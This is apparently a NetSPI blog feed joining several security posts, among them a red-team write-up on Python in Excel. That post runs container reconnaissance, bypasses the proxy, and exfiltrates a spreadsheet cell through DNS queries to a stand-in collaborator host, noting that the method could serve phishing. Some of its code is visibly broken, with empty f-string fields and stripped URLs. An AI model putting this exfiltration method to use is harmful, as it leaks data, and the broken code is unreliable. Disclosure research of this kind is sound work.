6 of the Spookiest Vulnerabilities from 2023

October might be the spookiest time of the year, but for cybersecurity practitioners in the trenches, vulnerabilities can cause quite a scare year-round.

What’s most frightening is that many data breaches today happen because of well-known attack paths using simple tactics, as opposed to highly-skilled threat actors using advanced methods to gain entry to systems. A prime example of this is the recent vishing attack that caused massive disruption at casino chain MGM Resorts, as well as the City of Fort Lauderdale falling victim to a $1.2 million scam during a phishing attack. These simple, yet successful, breach attempts happen every day, and if organizations aren’t adequately prepared, they can face scary repercussions.

It’s time to go back to the basics, and revisit the most common vulnerabilities across attack surfaces according to NetSPI’s 2023 Offensive Security Vision Report. When bolstering your organization’s security strategy, it can be helpful to review resources like our annual report as well as the OWASP API Security Top 10 to ensure the fundamentals are covered.

Here are the six spookiest vulnerabilities of 2023 and their tips for remeidation. For a more comprehensive look at the most common vulnerabilities, access NetSPI’s 2023 Offensive Security Vision Report.

First Things First: Understanding the Most Common Attack Surfaces

In our report, NetSPI analyzed over 300,000 anonymized findings from thousands of pentest engagements spanning more than 240,000 hours of testing. Initially, we pulled the top 30 most prevalent vulnerabilities from our six core focus areas, or attack surfaces, from Resolve ™, NetSPI’s penetration testing as a service (PTaaS) platform. The attack surfaces we analyzed are as follows:

Next Up: Cover Your Bases Against 2023’s Top Vulnerabilities 

1. Web Applications: Authorization Bypass – Missing Function Level Access Controls (MFLAC)

If an MFLAC vulnerability exists, the application does not perform adequate access control checks and unauthorized users can perform actions outside of their intended scope of permissions. This can result in the access, modification, or deletion of data within the system. In the most severe instances, it may be used for privilege escalation. It is extremely prevalent in web applications and can be difficult to identify every instance of it. Given how severe it can be, it will be one of the likeliest attack paths to theft of data in a system.

Remediation Tip

“Fine-grained access controls should be implemented to properly attribute authorization of records/objects as well as functions to the individually authenticated and authorized user.”

Paul Ryan, Director, Application Pentesting

2. Mobile Applications: Authorization Bypasses – Insecure Direct Object References (IDOR) and Missing Function Level Access Controls (MFLAC)

Mobile applications can be susceptible to IDOR and MFLAC vulnerabilities in the same way as web applications. IDOR vulnerabilities are a privilege escalation flaw that allow one user to access another user’s data. Many mobile applications receive less scrutiny on their server-side APIs because there is greater technical complexity involved in performing these reviews.

3. Thick Applications: Client Side Controls

The server side component of the application does not examine the data it retrieves from the client to validate if it is secure or correct. This vulnerability allows the client to perform unauthorized actions. 

Thick, mobile, and embedded applications are more susceptible to this vulnerability than other kinds of applications because developers often do not consider the client to be untrusted.  

Remediation Tip  

“Ensure all client → server calls are checked for proper authorization on the server. Additionally, perform server-side input validation on the client → server call to ensure a malicious client cannot access functionality they aren’t intended to access.”

Andre Joseph, Director, Thick Client Pentesting

4. Cloud: Publicly Available Resources Hosting Sensitive Data

A publicly available cloud resource allows public, anonymous access. This can apply to cloud services like storage or to IP addresses assigned to virtual machines. Inadvertent public/anonymous access can lead to the exposure of sensitive data. In addition, this access could also potentially lead to privilege escalation vectors into the cloud environment.

Remediation Tip  

“Ensure that all cloud services are restricted to internal, authenticated access if public access is not required. Employ a layered security approach that uses both individual service configuration settings and organization-wide policies as an additional guardrail.”

Thomas Elling, Director, Cloud Pentesting

5. External Network: Publicly Available Resources Hosting Sensitive Data

Sensitive information such as credentials, API keys, and internal domain information can inadvertently be exposed in publicly accessible places such as online source code repositories, cloud storage platforms, and public paste sites. Attackers may discover publicly accessible information and use it against the organization’s employees and infrastructure. Credentials or API keys may allow an attacker to gain unauthorized access to an organization’s systems or cloud services for example, while internal organizational details might be used to build effective pretext scenarios for targeted social engineering attacks.

Remediation Tip

“Ensure that effective policies, procedures, and monitoring solutions are established to safeguard the flow of organizational information to external locations. Review commonly targeted sources of information such as GitHub and Pastebin on a regular basis to identify and remove any sensitive information that may have been inadvertently disclosed.”

Ryan Krause, Principal Consultant, External Network Pentesting 

6. Internal Network: Network Protocol Attacks

This vulnerability category includes most of the top network protocols that we frequently target to gain an initial foothold on an internal network. Most of these protocols are enabled by default and may be unknown or unused by the client organization. Exploitation of these common protocols could allow an attacker to gain a man-in-the-middle position with unsuspecting users. This could lead to credential or sensitive data exposure, a foothold on the domain, and privilege escalation.

Remediation Tip  

“Remove support for commonly exploited protocols if they are not being utilized for a business purpose internally. For example, we frequently identify unutilized LLMNR and NBNS protocols unknowingly exposed on internal Windows networks, and disabling them through Group Policy could completely remove these attack vectors.”

Josh Weber, Director, Internal Network Pentesting

As cybersecurity programs continue to mature, going back to the basics will always be an essential first step to successful security planning – helping to avoid frightening scares down the line. Download NetSPI’s 2023 Offensive Security Vision Report today for more on these common vulnerabilities, our top remediation tips, and how to bolster your security posture with offensive security measures.  


NetSPI Wins Big with Breach and Attack Simulation

And the winner is… BAS! 

Since the launch of our Breach and Attack Simulation (BAS) enhancements in 2022, we’ve helped companies spanning all sizes and sectors improve their threat detection capabilities and move away from a ‘secure by default’ mindset that has rendered ineffective against the evolving and complex threat landscape. In fact, after implementing BAS, one NetSPI client saw a 500 percent detection coverage increase YoY! 

And the results go well beyond client testimonials, as NetSPI’s BAS offering has been recognized by two of the industry’s most prominent awards in 2023. NetSPI has been named:  

  1.  “Breach and Attack Simulation Solution of the Year” by the CyberSecurity Breakthrough Awards, and 
  2. Cutting Edge Breach & Attack Simulation” by Cyber Defense Magazine’s (CDM) Top InfoSec Innovators Awards 

Cyber Defense Magazine’s Editor, Yan Ross, commented on NetSPI’s BAS solution saying, “We scoured the globe looking for cybersecurity innovators that could make a huge difference and potentially help turn the tide against the exponential growth in cyber-crime. NetSPI is worthy of being named a winner in these coveted awards and consideration for deployment in your environment.” 

Both recognitions signify the importance and longevity of BAS, especially during a period of heightened cyber attacks and resource-constrained security teams. These awards further prove the value of in-depth detective control validation and the impact continuous testing can have on the industry’s future. 

Why Breach and Attack Simulation? 

With NetSPI data showing only 20% of common attack behaviors being caught by Endpoint Detection and Response (EDR), Security Information and Event Management (SIEM), and Managed Security Service Provider (MSSP) out-of-the-box solutions, security teams need a way to continuously simulate and track real attack behavior. BAS solves this ongoing problem and has become a powerhouse solution and critical component to any tech stack – allowing organizations to extend their security controls and better detect attacks across the kill chain.  

BAS works by combining the AttackSim cloud-native technology platform with hands-on counsel from our expert penetration testing team to deliver a continuous 360-degree view of an organization’s detective controls tested against real-world attack Tactics, Techniques, and Procedures (TTPs).

Product Pulse: Live Demo of Breach and Attack Simulation (BAS)

Learn more about NetSPI’s Breach and Attack Simulation solution or schedule time to connect with us for a one-on-one discussion on validating your detective control efficacy.


How To Protect Businesses from Social Engineering Attacks this Cybersecurity Awareness Month and Beyond 

Don’t be afraid of social engineering attacks this Cybersecurity Awareness Month! Use the four tactics in this article to defend against them. 

This year marks the 20th anniversary of Cybersecurity Awareness Month, a collaborative effort between government and businesses to raise awareness about digital security and empower both organizations and individuals to protect their online data from cybercriminals.  

NetSPI is proud to be recognized among industry peers as a Cybersecurity Awareness Month Champion Organization. As a leader in offensive security, we’re committed to partnering with our peers to collectively advance security. Technology has a significant impact on addressing cybersecurity challenges. However, people are an essential part of keeping personal and business data secure. By working together, we can make strides toward stronger systems and safer data as a whole. 

Security education and awareness have come a long way since the first Cybersecurity Awareness Month 20 years ago. But the mission never ends. More effort is needed to protect expanding attack surfaces against increasingly sophisticated threat actors. The theme for 2023’s Cybersecurity Awareness Month is “Secure Our World,” focusing on ways individuals and businesses can protect against online threats. 

In the spirit of this year’s theme, we created a parody of the Monster Mash to share social engineering prevention tips far and wide. Enjoy the video and share with your teams for a nudge toward improved security this October and year-round!

Read on to learn the importance of these social engineering prevention tips, and how you can keep your business and customer data more secure. 

Use Strong Passwords and a Password Manager 

In 2022, threat actors leaked more than 721 million passwords. Among the passwords exposed, 72 percent of users were found to be still using already-compromised passwords. 

As threat actors identify new ways to expose more passwords, using unique passwords is essential to protecting business and personal data.  

Some best practices for strong passwords include:

  • Using unique passwords for each online account or platform 
  • Updating passwords as soon as you’re notified of a breach  
  • Creating long passwords (typically longer than 12 characters) 
  • Ensuring passwords are complex by using a combination of lowercase and capital letters, numbers, and special characters  
  • Avoiding personal identifiable information in passwords, such as birth dates, your address, pet names, family member names, or your company name 

To secure your passwords further, use a password manager, which helps users create, save, manage, and use passwords across different online services and accounts. Passwords are stored in an encrypted database to ensure protection and when a user is logged into the password manager, credentials can be retrieved so unique passwords don’t need to be remembered for each individual account. Using a password manager goes a long way toward removing the friction that can deter people from proper password hygiene.

Turn on Multifactor Authentication

Even strong, secure passwords can be exposed by attackers. Leveraging multifactor authentication (MFA) can prevent exposed passwords from being used. MFA is a multi-step process that requires users to enter more information than simply a password to log into an account.  

Some platforms or services require MFA while others include it as an option for user accounts. Taking a few extra seconds to complete MFA can significantly enhance security.

Some examples of multifactor authentication include:

  • Security questions to verify a user’s identity 
  • Codes sent to a user’s phone number or email address  
  • Fingerprint verification on mobile devices  

NetSPI’s Social Engineering Lead, Patrick Sayler, underscored the importance of multifactor authentication in today’s threat environment: 

“Multifactor authentication is an absolute requirement if you’re exposing services to the internet. It may not prevent modern adversary-in-the-middle phishing campaigns, which can intercept both the time-based token value and resulting user session, but it still acts as an excellent first line of defense against password-spraying and basic phishing attacks. 

However, MFA fatigue is a legitimate concern and has resulted in initial access during our external network tests on numerous occasions. Most corporate multifactor solutions now offer number matching to prevent users from accidentally accepting a rogue authentication request. Enabling this feature requires a user to enter a specific number in their MFA mobile app, which prevents them from accidentally accepting a rogue incoming push notification.”

Recognize and Report Phishing

Social engineering, which refers to when threat actors attempt to trick employees into exposing sensitive information, is on the rise. In fact, 98 percent of cyber attacks involve some form of social engineering.  

Some of the most common types of social engineering include vishing (phone), phishing (email), and smishing (text).  

As an example, a vishing attack recently took down several of casino chain MGM Resorts’ systems, including hotel room keys and slot machines, for a few days. The threat actors responsible for the attack leveraged vishing through MGM’s help desk to gain access to the network. They found an employee’s information on LinkedIn, pretended to be them in a call to MGM’s IT help desk, and obtained credentials to access and infect the systems. 

This attack underscores the importance of recognizing and reporting vishing, phishing, and other similar social engineering attacks.  

Sayler shared, “For the help desk, having a set workflow of interactions, policies, and requirements, and sticking to them, will greatly reduce an attacker’s chance of success. Whenever I call and they start to push back, I end it and try to get a different agent on the phone. If they push back too, then that’s a good indicator that the department has been effectively trained and likely won’t deviate from the proper procedure. There’s only so much that you can do if everyone follows an established process and isn’t willing to budge.” 

Steps businesses can take to recognize, report, and prevent phishing and related social engineering attacks include:

  • Train all employees on security best practices and processes from the top down – including C-suite employees – rather than only educating new team members on procedures 
  • Create and implement a standardized playbook for employees to use when faced with a malicious form of communication 
  • Leverage email security technologies but don’t rely on them as your only line of defense 
  • Screen all incoming calls, text messages, and emails for malicious behavior 
  • Test your framework by engaging penetration testing services to perform common social engineering attack methods within your organization 

Update Software

Many individuals make the mistake of falling behind on software updates for their personal or business systems. Some factors that contribute to this include that users are unaware that updates or patches are available, or they need a notification for an update while they’re in the middle of a task, resorting to pushing the update off to a later date.

According to NetSPI’s Offensive Security Vision Report, software versions with known vulnerabilities can be an easy target for malicious actors and have a significant impact on personal or business security. Our analysis of more than 300,000 anonymized findings from thousands of pentest engagements showed that Vulnerable Software and OS Versions (Missing Critical Patches) is a top vulnerability for both external networks and the cloud. 

New exploits are released on a regular basis by security researchers (as well as threat actors), and if left unpatched, outdated software can quickly become an entry point into the organization. 

Some tips to ensure you update software to the latest, most secure versions include:

  • Enable automatic updates so you don’t need to monitor for the latest patches and enhancements on your own 
  • Update software when prompted, even if this means pausing your work for a few minutes to restart your devices  
  • Be aware of red flags for phishing, such as pop-up windows in your browser prompting you to urgently update software

Enhance Offensive Security with NetSPI

While Cybersecurity Awareness Month takes place once a year, an ongoing commitment to enhanced security will help us all move the needle. To strengthen your company’s social engineering prevention, NetSPI’s social engineering testing can help validate and improve your procedural security controls and employee training.  

Learn more about NetSPI’s social engineering services or schedule a demo to speak directly with a member of our team.


Help Net Security: NetSPI boosts phishing resilience with enhanced social engineering penetration testing

NetSPI’s social engineering penetration testing enhancements were highlighted in Help Net Security. Read the preview below or view it online.


NetSPI unveiled enhancements to its social engineering penetration testing solutions to help organizations build resilience to modern-day phishing attacks. The updates bring a customized, contextual approach to social engineering testing and go beyond basic phishing campaigns to simulate advanced techniques such as device code and OAuth application phishing and capturing multi-factor authentication tokens.

NetSPI has identified opportunities to update its processes and tooling to create efficiencies, cost savings, and scalability. The phishing tests follow NetSPI’s platform driven, human delivered methodology, leveraging a combination of technology and manual testing to customize engagements and more accurately simulate adversaries based on business context.

All tests are managed and delivered in NetSPI’s Pentesting as a Service (PTaaS) platform, to provide a streamlined program management experience.

You can read the full article at!


NetSPI Enhances Social Engineering Penetration Testing Solutions During Cybersecurity Awareness Month

Latest updates from offensive security leader address how organizations can better protect themselves against the sophisticated techniques behind modern-day phishing attacks.

Minneapolis, MN – October 19, 2023NetSPI, the global leader in offensive security, today announced enhancements to its social engineering penetration testing solutions to help organizations build resilience to modern-day phishing attacks. The updates bring a customized, contextual approach to social engineering testing and go beyond basic phishing campaigns to simulate advanced techniques such as device code and OAuth application phishing and capturing multi-factor authentication tokens. 

NetSPI has identified opportunities to update its processes and tooling to create efficiencies, cost savings, and scalability. The phishing tests follow NetSPI’s platform driven, human delivered methodology, leveraging a combination of technology and manual testing to customize engagements and more accurately simulate adversaries based on business context. All tests are managed and delivered in NetSPI’s Pentesting as a Service (PTaaS) platform, to provide a streamlined program management experience. 

Social engineering remains one of the top ways adversaries gain access to environments and sensitive information. Phishing attempts are becoming more sophisticated and less recognizable. The use of emerging technologies such as artificial intelligence (AI) has redefined and reimagined traditional phishing attacks, creating widespread impact. 

“Phishing remains a persistent threat to any organization. It is imperative for organizations to continuously evaluate their resiliency to phishing as adversaries continue to evolve and develop new, advanced techniques,” says Patrick Sayler, Director of Social Engineering at NetSPI. “To better reflect the challenges our clients are facing today, we’ve updated our social engineering testing capabilities to deploy modern, advanced techniques that more accurately evaluate an organization’s defense against these attacks at a larger scale.” 

In tandem with the increased risk and sophistication, this news comes during Cybersecurity Awareness Month, which is led by the National Cybersecurity Alliance and the Cybersecurity and Infrastructure Agency (CISA). NetSPI has signed on to be a Champion of the initiative which brings organizations together to promote cybersecurity awareness and best practices for data protection.  

This year, the organizations are bringing awareness to four critical steps to stay safe online, one of which is to “recognize and report phishing.” NetSPI’s enhancements align with their mission and aim to not only help organizations evaluate their security awareness programs and policies, but also demonstrate the potential impact of a successful phish and provide clear, actionable recommendations for program improvement. 

To learn more about NetSPI’s social engineering penetration testing solutions, visit:

About NetSPI

NetSPI is the global leader in offensive security, delivering the most comprehensive suite of penetration testing, attack surface management, and breach and attack simulation solutions. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. Its global cybersecurity experts are committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, four of the top five leading cloud providers, four of the five largest healthcare companies, three FAANG companies, seven of the top 10 U.S. retailers & e-commerce companies, and many of the Fortune 500. NetSPI is headquartered in Minneapolis, MN, with offices across the U.S., Canada, the UK, and India. 

Media Contacts: 
Tori Norris, NetSPI
(630) 258-0277  

Jessica Bettencourt, Inkhouse for NetSPI
(774) 451-5142


A First Look at Python in Excel

Microsoft recently announced support for Python in Excel, and have begun making it available to the public via the Microsoft 365 Insiders Program. I wanted to explore how this functionality could be leveraged for Red Team Operations and am slowly researching it in my spare time. Here I present a quick overview of this functionality and some ways it may be used.

It’s worth noting that this is a Preview release of this functionality, and is likely going to differ from what’s eventually fully released.

Running Python Code

Python code can be executed using the new PY() formula. This takes our Python code, sends it to a remote container (hosted by Microsoft), executes it and returns the result. We can then use the results in our workbook. An example can be seen in the following screenshot:

This code is evaluated in the container and the result returned and displayed in Excel. We can also process values in the sheet using the xl() function. 

Excel also provides a diagnostics panel, where we can see the output of print() statements, or errors returned by the Python interpreter. We will make heavy use of this panel throughout this post.  

Exploring the Environment 

We have the ability to run arbitrary code in an unknown environment. As with any such access, we want to learn as much about the environment as we can. Let’s start with the basics, like our username, a process list and dumping environment variables.  

We can use the following code to extract this information:

import psutil 
import os 

print("proccess list") 
processes = psutil.process_iter() 
for process in processes: 
    print(f"Process ID: {}, Name: {}") 

print("environment vars") 

Which gives us the following (redacted) output: 


proccess list 

Process ID: 1, Name: pause 
Process ID: 27, Name: sh 
Process ID: 32, Name: msiAtlasAdapter 
Process ID: 35, Name: tail 
Process ID: 56, Name: 
Process ID: 61, Name: conda 
Process ID: 63, Name: dotnet 
Process ID: 83, Name: bash 
Process ID: 100, Name: condaentrypoint 
Process ID: 101, Name: jupyter-noteboo 
Process ID: 468, Name: python 

environment vars 

environ({'Fabric_NET-0-[Delegated]': '', 'OfficePy__DataUploadPath': '/mnt/data_upload', 'IDENTITY_API_VERSION': '2020-05-01', 'CONDA_EXE': '/usr/bin/conda', '_CE_M': '', 'HOSTNAME': 'SandboxHost-<REDACTED>', 'IDENTITY_SERVER_THUMBPRINT': '<REDACTED>', 'OFFICEPY_DATA_UPLOAD_PATH': '/mnt/data_upload', 'DOTNET_VERSION': '7.0.10', 'Logging__LogLevel__Default': 'Information', 'OfficePy__ComputeResourceId': <redacted>', 'ASPNETCORE_URLS': 'https://+:80', 'PWD': '/app', 'OfficePy__Jupyter__Url': 'https://localhost:8888', 'CONDA_ROOT': '/usr/share/conda', 'Fabric_NetworkingMode': 'Other;Delegated', 'JUPYTER_TOKEN': '<REDACTED>8', 'CONDA_PREFIX': '/app/officepy', '_': '/app/officepy/bin/jupyter', 'Fabric_Id': '<REDACTED>', 'Fabric_ApplicationName': 'caas-<REDACTED>', 'HOME': '/home/jovyan', 'Fabric_CodePackageName': 'codeexecsvc', 'CONDA_PROMPT_MODIFIER': '(/app/officepy) ', 'Kestrel__Endpoints__HttpsInlineCertFile__Url': 'https://*:5002', 'Fabric_NodeIPOrFQDN': '', 'IDENTITY_HEADER': 'ey<REDACTED>Fl', 'OfficePy__ComputeResourceKey': '<REDACTED>', 'TERM': 'xterm-color', '_CE_CONDA': '', 'NO_PROXY': 'localhost,', 'CONDA_SHLVL': '2', 'Fabric_ServiceDnsName': 'service.caas-<REDACTED>', 'OfficePy__Jupyter__Token': '<REDACTED>', 'SHLVL': '2', 'ASPNET_VERSION': '7.0.10', 'HTTPS_PROXY': 'https://localhost:8000', 'HTTP_PROXY': 'https://localhost:8000', 'DOTNET_RUNNING_IN_CONTAINER': 'true', 'CONDA_PYTHON_EXE': '/usr/bin/python3', 'Fabric_ServiceName': 'service', 'CONDA_DEFAULT_ENV': '/app/officepy', 'Kestrel__Endpoints__HttpsInlineCertFile__Certificate__Path': '/mnt/secrets/sslcert', 'PATH': '/app/officepy/bin:/usr/condabin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin', 'CONDA_PREFIX_1': '/usr', 'OFFICEPY_DEPLOYMENT_INSTANCE': 'prodp6-ukwest-<REDACTED>', 'PYDEVD_USE_FRAME_EVAL': 'NO', 'JPY_PARENT_PID': '101', 'CLICOLOR': '1', 'FORCE_COLOR': '1', 'CLICOLOR_FORCE': '1', 'PAGER': 'cat', 'GIT_PAGER': 'cat', 'MPLBACKEND': 'module://matplotlib_inline.backend_inline'})

From this output we can see that we are a low privilege user, the container is running some .NET code, and appears to be using Jupyter Notebook.  

We can also see that HTTP_PROXY and HTTPS_PROXY are set in the environment variables. These will be used by some command line tools to specify a proxy to use when connecting out from the container. As these are pointing at localhost, it is very likely this is being used as a way to prevent outbound internet access.  

We can see the ‘OfficePy__Jupyter__Url’: ‘https://localhost:8888’ value in the environment variables as well. Let’s see if we can connect to that and grab the HTML. 

We can use the following code:

import requests 

r = requests.get('https://localhost:8888') 

Which returns our output in the Diagnostics panel:

Tidying this up and rendering as HTML lets us see the page served at this address:

Obviously this doesn’t have any of the referenced script files to render, but it looks like we have at least some access to the Jupyter web interface.  

Moving on, lets see if we can get outbound internet access. We know that proxy settings are specified in the environment variables, maybe they will actually allow outbound access?

import requests 

r = requests.get('') 

Ok, it was a long shot. What about if we bypass those proxy settings?

import requests 

session = requests.Session() 
session.trust_env = False 
r = session.get('') 

That’s interesting. We didn’t send a keyboard interrupt. The container must have a timeout set somewhere which kills running Python scripts after a set amount of time (about 30 seconds). It looks like there is no route out from the container to the Internet.  

Let’s try DNS. 

To quickly test if we have DNS outbound, we can use Burp Suite Collaborator. This will give us a unique address that we can query and let us know if a DNS request was received.

import socket 

data = socket.gethostbyname_ex(‘<collaborator URL>’) 


We have DNS outbound. Let’s see if we can exfiltrate some data from the sheet.

Here we are grabbing a value from C1 and using it as part of a DNS query.

As we can see in the collaborator output above, we are able to exfiltrate data from the sheet via DNS.  

We could potentially leverage this as part of a phishing campaign, or to exfiltrate data from a compromised endpoint, we could even use Python to encrypt the data before sending it out.  

Mark Of The Web 

For this to be useful in a Phishing campaign, we need to understand how Mark of the Web (MOTW) affects these formulas. Office 365 now, by default, blocks any macros coming from the Internet. When opening a macro-enabled document, the user will first be presented with this warning: 

Clicking through this will present the following error: 

Let’s see what happens when we download a document containing only a Python formula.

After clicking “enable editing” we are able to interact with the document as normal, even though it has MOTW applied.

Examining the HTTP Traffic 

So far, we have seen how we run Python code, how the container is configured, determined that we have DNS outbound access and seen how MOTW affects documents containing Python formula. But how does Excel actually run code in the containers?  

We can make an educated guess that Excel is likely using HTTP to send data out; there’s a chance it’s using TCP-based connections, but this is unlikely. To explore this further, we need to set up an intercepting proxy to view traffic sent from our test host. We could use Burp Suite, but Fiddler tends to be easier to use with local applications, so that’s what we’ll use.  

With Fiddler running, we can trigger some Python code to run. To make sure we capture all the traffic, we can close and re-launch Excel (removing any cached data in the process).

Office is making a lot of requests, but the four bottom ones to ‘service-preview-p1..’ stand out.  

Viewing the raw messages for each request, we eventually find our Python code being sent to the server and the calculated result being returned.

Examining the preceding requests lets us build an understanding of how the environments are constructed and configured, before our code is executed.  

First, Excel sends a request to ``. The response to this contains the URL to be used for future requests, and a CDN URL ( 

We can see a request made to this CDN, which returns a number of Python files. These are likely the scripts available within the container:

Going back to our setup steps, Excel makes a POST to the URL returned by its initial request, containing some IDs. These are auto-generated.

A further request is made, this time to the /runtimes endpoint.

Next, Excel sends some setup Python code.

Finally, our code is sent to the container to be processed.

I’ve converted this sequence into a Python script, which can be used to run arbitrary Python code in a container. You just need to provide a valid Bearer token. You can find this script here: 

This script also supports sending cell data to the container for processing, which we’ve not covered here. You can see an example of this script returning data below:

Final Thoughts 

We’ve covered quite a lot in this post, but there is definitely still work left to do to fully understand the full potential of this new Excel feature.  

Get to know NetSPI by exploring our Red Team Operations.

Enhance Security with NetSPI's Red Team Operations

Recent Posts


Deciphering the Omnibus for Medical Device Security

Table of Contents


The Consolidated Appropriations Act of 2023 brings a substantial change to the regulation of medical device cybersecurity. Section 3305 mandates that medical device manufacturers must submit comprehensive plans to the FDA, focusing on monitoring, identifying, and proactively addressing medical device vulnerabilities. This shift aims to enhance the safety and integrity of medical devices, emphasizing the importance of cybersecurity in healthcare. 

The Consolidated Appropriations Act of 2023 (Omnibus), which was enacted on December 29, 2022, has introduced a significant shift in the regulation of medical devices, particularly in cybersecurity. This legislation mandates that medical device manufacturers must submit comprehensive plans to the Food and Drug Administration (FDA) for monitoring, identifying, and addressing cybersecurity vulnerabilities within their products.  

Notably, the law is characterized by its foundational correctness and forward-looking approach, ensuring adaptability to evolving cyber threats. Moreover, the FDA receives specific funding, totaling $5 million, to bolster its efforts in the field of cybersecurity. This new legal framework requires a thorough understanding of its intricacies to prepare for compliance.  

We conducted a detailed analysis of the updated requirements and compiled a clear and actionable summary to help navigate the changing landscape effectively. 

Key Milestones in the Consolidated Appropriations Act of 2023 (Omnibus)

  • December 29, 2022: Consolidated Appropriations Act, 2023 (Omnibus) was signed into law 
  • March 29, 2023: Changes detailed in the Omnibus go into effect 
  • October 1, 2023: FDA issued guidance that it does not intend to issue “refuse to accept” decisions based solely on the new cyber requirements  

Summary of Updates Relevant to Medical Device Security

Section 3305 of the Consolidated Appropriations Act, titled “Ensuring Cybersecurity of Medical Devices,” represents a pivotal development in the regulatory landscape. Under this section, medical device manufacturers are now required to submit comprehensive plans to the Food and Drug Administration (FDA) designed to ensure the cybersecurity of their products. These plans must encompass a range of considerations, including the monitoring, identification, and proactive addressing of vulnerabilities within medical devices.  

The requirements include aspects such as vulnerability disclosures, encouraging information sharing within the industry, and the establishment of incident response protocols. By focusing on these critical security elements, Section 3305 not only bolsters the safety and integrity of medical devices but also emphasizes the importance of collaboration and transparency in combating cyber threats within the healthcare sector. 

What to Include in the Plan for the FDA

The medical device security plan submitted to the FDA encompasses several critical components designed to enhance the cybersecurity of medical devices. Manufacturers are mandated to develop strategies for monitoring, identifying, and addressing cybersecurity vulnerabilities and potential exploits, with a focus on coordinated vulnerability disclosure and related procedures.  

Moreover, manufacturers must establish and maintain processes to ensure that the device and associated systems are sufficiently cyber-secure. This includes the provision of post-market updates and patches, addressing known unacceptable vulnerabilities on a reasonable schedule and addressing critical vulnerabilities that could pose uncontrolled risks as soon as they are discovered. 

Additionally, the requirements expand government involvement in this sector. They task the Government Accountability Office (GAO) with preparing reports and conducting reviews. Furthermore, there’s a mandate to publish guidance on the content of premarket submissions to manage cybersecurity in medical devices and make public resources available to improve the cybersecurity of these devices. 

The Comptroller General of the U.S. is also directed to produce a report assessing the challenges faced by stakeholders in accessing federal support for addressing vulnerabilities across federal agencies. It’s important to note that non-compliance with these cyber device submission elements is prohibited under Section 301 of the Federal Food, Drug, and Cosmetic (FD&C) Act, underscoring the gravity of these updates. 

Breach Notification Guidelines and Incident Reporting

Should a data breach occur, the Cyber Incident Reporting for Critical Infrastructure Act (CIRCIA) details information required for reporting. Although, these requirements do not go into effect until late 2024 or 2025 when final rulemaking is expected, reporting requirements will include:  

  • Report certain cyber events to the Cybersecurity and Infrastructure Security Agency (CISA) within 72 hours after a substantial incident 
  • Report ransomware payments within 24 hours  

Key Considerations when Implementing Omnibus Requirements

For individuals on the frontline of executing the updated requirements, these four considerations are helpful to keep in mind:  

  1. Network Status
    It’s often parroted that you cannot protect what you cannot see, but you also cannot investigate any mishap or accident to understand the root cause of a cyber incident without a dynamic, real-time status map of the inventory of machines and computers communicating in your environment. This is an area in which Attack Surface Management is extremely beneficial to help organizations with continuous, real-time asset discovery and monitoring.
  2. Product Vulnerabilities
    Not all vulnerabilities carry the same weight. The degree to which vulnerabilities impact integrity and availability of systems varies. Some vulnerabilities have limited scope in that they only apply to a few types of software features or interfaces, while others may have additional compensating controls that can mitigate their severity. 
  3. Threat Actor Capabilities
    For many medical devices, the primary attack surface is their default credentials over Secure Shell (SSH). Once the attacker has gained entry, they will check to determine the underlying operating system to decide which payload to install on the system, often to deploy a botnet attack. 
  4. Data Rich, Information Poor
    Behavioral analysis and anomaly detection for network operations can augment threat intelligence and overall security postures. Continuous monitoring and analytics help security leaders diagnose the root cause of unexpected operational changes and deviations from baseline behavior. 

By addressing these areas, organizations will be better positioned to protect their medical device systems and data. 

Updated Definition of a Cyber Device

In the Omnibus legislation, a “cyber device” is defined by three key attributes: 

  • It includes software validated, installed, or authorized by the sponsor, indicating its integral role in device functionality.
  • It must possess the ability to connect to the internet. 
  • It encompasses any technological characteristics that have been validated, installed, or authorized by the sponsor, which could potentially be susceptible to cybersecurity threats.  

This definition extends its reach to the Internet of Medical Devices (IoMT), covering an array of healthcare innovations, from smart diagnostics to wearable devices, insulin pumps, and even pacemakers. By focusing on these criteria, the legislation aims to ensure the security and responsible use of these connected devices. 

How the U.S. Department of Health and Human Safety is Assisting

In March 2023, the U.S. Department of Health and Human Services (HHS) introduced the “Health Care and Public Health Sector Cybersecurity Framework Implementation Guide.” This non-binding resource aids hospitals and healthcare facilities in adopting the NIST Cybersecurity Framework by covering five concepts for boards to follow: 

  1. Approach cybersecurity as an enterprise-wide risk management issue, not just an IT issue  
  2. Understand the legal implications of cyber risk as they apply to the company’s specific circumstances  
  3. Ensure they have adequate access to cybersecurity expertise and discussions about cyber-risk management should be given regular and adequate time on the board meeting agenda  
  4. Set the expectation that management will establish an enterprise-wide cyber-risk management framework  
  5. Include identification of which risks to either avoid, accept, mitigate, or transfer through insurance, as well as specific plans associated with each approach, in discussions of cyber risks between the Board and organizational management 

Visit the guide for more information, Health Care and Public Health Sector Cybersecurity Framework Implementation Guide. 

At NetSPI, our goal is to equip our clients to maintain the security of their systems and avoid potential breaches. Our healthcare-specific expertise helps organizations plan for updated requirements and achieve compliance to create secure medical devices. Learn more about our healthcare security or contact us today for a consultation.


NetSPI’s Analysis of HTTP/2 Rapid Reset 

A novel 0-day vulnerability referred to as, “HTTP/2 Rapid Reset,” (CVE-2023-44487) sent the cybersecurity industry into quick action to minimize potential risks. This vulnerability abuses certain features of HTTP/2 protocol and allows for Distributed Denial of Service (DDoS) attacks at an unprecedented scale.  

Explain It to Me Like I’m 5 (ELI5)

If your website or application uses HTTP/2, an attacker could completely restrict access by flooding your network with an overwhelming amount of traffic.  

For additional insights, we connected with our Attack Surface Management (ASM) team to get their take on the CVE and learn more about their quick response to help security leaders with identification and remediation.

Who’s Impacted?

Anyone who uses HTTP/2 services may be impacted. According to Web Technology Surveys, the services are used by 35.6% of all websites. That’s over 400 million websites vulnerable to this CVE.

What Could Happen If Exploited

The industry is seeing large-scale DDoS attacks stemming from exploitation of HTTP/2 Rapid Reset. The goal of a DDoS attack is to overwhelm a particular business, service, or application and keep it from being accessible to legitimate access requests from the intended users/customers.  

This is extremely challenging to manage since the attacks come from compromised machines or ‘bots’ in a very distributed fashion, which makes blocking those requests using simple filtering techniques unrealistic. In other words, significant friction or inability to deliver services. We’re already seeing the exploit in action, with Google reporting that it had mitigated the largest ever DDoS attack to date.

Best Practices for Remediation

First, it is important to understand if and where you are using HTTP/2 to determine if you are affected. Mapping out a full view of the attack surface is often a challenge for teams because of attack surface sprawl and changes that can happen overnight. 

As NetSPI’s Field CISO Nabil Hannan put it, 

